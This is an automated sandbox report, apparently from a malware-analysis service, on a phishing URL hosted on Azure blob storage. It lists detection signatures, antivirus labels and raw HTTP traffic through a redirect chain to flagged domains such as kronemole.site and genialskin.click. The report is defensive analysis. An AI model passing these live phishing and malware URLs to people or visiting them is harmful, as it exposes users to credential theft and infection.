Edit tour

Windows Analysis Report
https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518

Overview

General Information

Sample URL:https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518
Analysis ID:1345967
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Phisher
Antivirus detection for URL or domain
Creates files inside the system directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2224,i,7768767200719892686,964844701438018418,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6380 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_87JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      0.5.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
        0.2.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
          0.1.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
            0.4.pages.csvJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://event.trk-essursta.com/register/event_log/v9e118mez8Avira URL Cloud: Label: malware
              Source: https://trk-essursta.com/scripts/push/v9e118mez8Avira URL Cloud: Label: malware
              Source: https://subscription.trk-essursta.com/register/push/v9e118mez8Avira URL Cloud: Label: malware
              Source: https://genialskin.click/?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079Avira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.5.pages.csv, type: HTML
              Source: Yara matchFile source: 0.2.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.4.pages.csv, type: HTML
              Source: Yara matchFile source: 0.3.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_87, type: DROPPED
              Source: unknownHTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.199.50.2:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49807 version: TLS 1.2
              Source: unknownDNS traffic detected: queries for: clients2.google.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 23.199.50.2
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.218.148
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.218.148
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /0/2/41423/3af5e0a6c068554b3d8550e8c2d39e93/2000/11677_1/49922_7518_2794_32559_md HTTP/1.1Host: humifications.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079 HTTP/1.1Host: genialskin.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://humifications.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /00751fdff8a0f3cf22b7cf59c24e5f09 HTTP/1.1Host: kronemole.siteConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://humifications.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/vendors/fontawesome/css/all.css HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/css/isp/common.css?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /inc/msg.v3.js?655ce1bf9202e HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/js/vendor/jquery-3.4.1.min.js HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/js/vendor/bootstrap/js/bootstrap.min.js HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/vendors/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kronemole.sitesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kronemole.site/assets/vendors/fontawesome/css/all.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/js/functions.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/js/intl_functions.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /assets/js/isp/common.js?v=3cc6aa721bc3b8a31b45d9388214360e HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /uploads/archive/company/1080/images/INES-wt.png HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
              Source: global trafficHTTP traffic detected: GET /fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg HTTP/1.1Host: kronemole.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
